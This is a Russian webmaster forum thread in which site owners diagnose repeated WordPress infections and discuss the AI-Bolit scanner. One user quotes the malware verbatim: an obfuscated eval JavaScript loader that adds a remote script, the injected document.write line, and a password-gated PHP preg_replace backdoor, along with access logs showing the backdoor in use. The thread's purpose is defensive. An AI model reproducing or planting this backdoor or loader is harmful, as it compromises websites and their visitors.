- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
где то на вашем аккаунте хостинга незаметно лежит шелл, с помощью него и вписывают.
ай-болитом проверяли сайты?
Да. Экспресс метод. Полный метод через SSH не получается запустить:
Error: cannot run on php-cgi. Requires php as cli
See FAQ: http://revisium.com/ai/faq.php
В факе ничего об этой ошибке.
Работал по этому мануалу
кспресс-проверка (не рекомендуется):
-------------------------------------
1. в файле /ai-bolit/ai-bolit.php найти строку
define('PASS', '....
Вписать во вторых апострофах пароль, например mypass6.
define('PASS', 'MyPass234');
2. скопировать из папки /ai-bolit/ файлы на сервер в корневой каталог
3. скопировать из папки know_files файлы, которые соответствуют вашей cms (если таких файлов нет, то ничего страшного)
4. открыть в браузере http://ваш_сайт/ai-bolit.php?p=MyPass234 и ждать отчета
5. после отображения отчета удалить файлы от айболита и сам скрипт с сайта
Если что-то пошло не так, читаем FAQ: http://revisium.com/ai/faq.php
Полная проверка (рекомендуется):
--------------------------------
1. скопировать из папки /ai-bolit/ файлы на сервер в корневой каталог
2. скопировать из папки know_files файлы, которые соответствуют вашей cms (если таких файлов нет, то ничего страшного)
3. подключиться к серверу по ssh, перейти в папку сайта
4. выполнить команду в командной строке
php ai-bolit.php
5. дождаться окончания сканирования
6. скопировать с сервера файл AI-BOLIT-REPORT-<дата>-<время>.html
Если что-то пошло не так, читаем FAQ: http://revisium.com/ai/faq.php
AAAAllleex, что в отчете?
AAAAllleex, что в отчете?
Всё хорошо.
Вы так и не сказали как нашли:(:(
AAAAllleex, секрет фирмы....
когда все хорошо, взломов не бывает.
все сайты проверили?
AAAAllleex, секрет фирмы....
когда все хорошо, взломов не бывает.
все сайты проверили?
Тут народ на хостеров грешит. Однако, всё может быть.
Тут народ на хостеров грешит.
Маловероятно.
Очередное заражение
В файл navigation.js дописали:
document.write("<scr"+"ipt src='/wp-includes/js/mediaelement/candy.js'><"+"/script>");
и добавили файл:
wp-includes/js/mediaelement/candy.js
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 p(f){7(f).o("").n().r("")}5 b(d){k(3.j&&3.a){2 8=3["a"](\'s\')[0];2 4=3.j(\'t\');4.g(\'m\',"l/q");4.g(\'A\',d);8["C"](4)}}2 c="D://u.E.F/B";2 e="w";2 6=v["x"]["y"]();5 9(){7 6["h"](e)!=-1}5 i(){7 6.h("z")==-1}k(i()&&9()){b(c)}',42,42,'||var|document|HHHHVjwZ|function|JvvUnzHH|return|OWEV|jOYumjF|getElementsByTagName|LYXg|dbiq|sTXIqbf|fiJEYWgF|wzvPUChl|setAttribute|indexOf|KpkcHax|createElement|if|text|type|reverse|split|bXKzI|javascript|join|head|script|arreup|navigator|win|userAgent|toLowerCase|chrome|src|2832e2284ebcc386cd95d24cb037a953c9c8a4d04eabf0876b9349044f12b296b3aa647e68b0213fed1f15848a89b02310ad5905681726066009a3cb4baa35d6e190a962788e72bc41ff155027edf37571273924d8b9427a48e6a2222ab00281cb731057ea6ccc4195ca2f116cae5a2bd86613df|appendChild|http|pp|ua'.split('|'),0,{}))
в файле wp-includes/SimplePie/config.inc.php:
<?php
if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
Вот лог использования файла:
5.39.47.1 [20/Jan/2014:01:26:54 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2
5.39.47.1 [20/Jan/2014:01:26:54 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 51
5.39.47.1 [20/Jan/2014:01:26:55 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 213
5.39.47.1 [20/Jan/2014:01:26:59 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52
5.39.47.1 [20/Jan/2014:16:06:33 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2
5.39.47.1 [20/Jan/2014:16:06:33 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 65
5.39.47.1 [20/Jan/2014:16:06:34 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 218
5.39.47.1 [20/Jan/2014:16:06:35 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52
5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2
5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 51
5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 214
5.39.47.1 [20/Jan/2014:21:30:45 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52
это и есть бекдор
if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
Тут народ на хостеров грешит. Однако, всё может быть.
Хостер тоже играет не маловажную роль.
наша песня хороша, начинай сначала...
снова jquery, снова хост лайф...
Кстати, подскажите кто-нибудь как разрешить метод POST только определенным IP.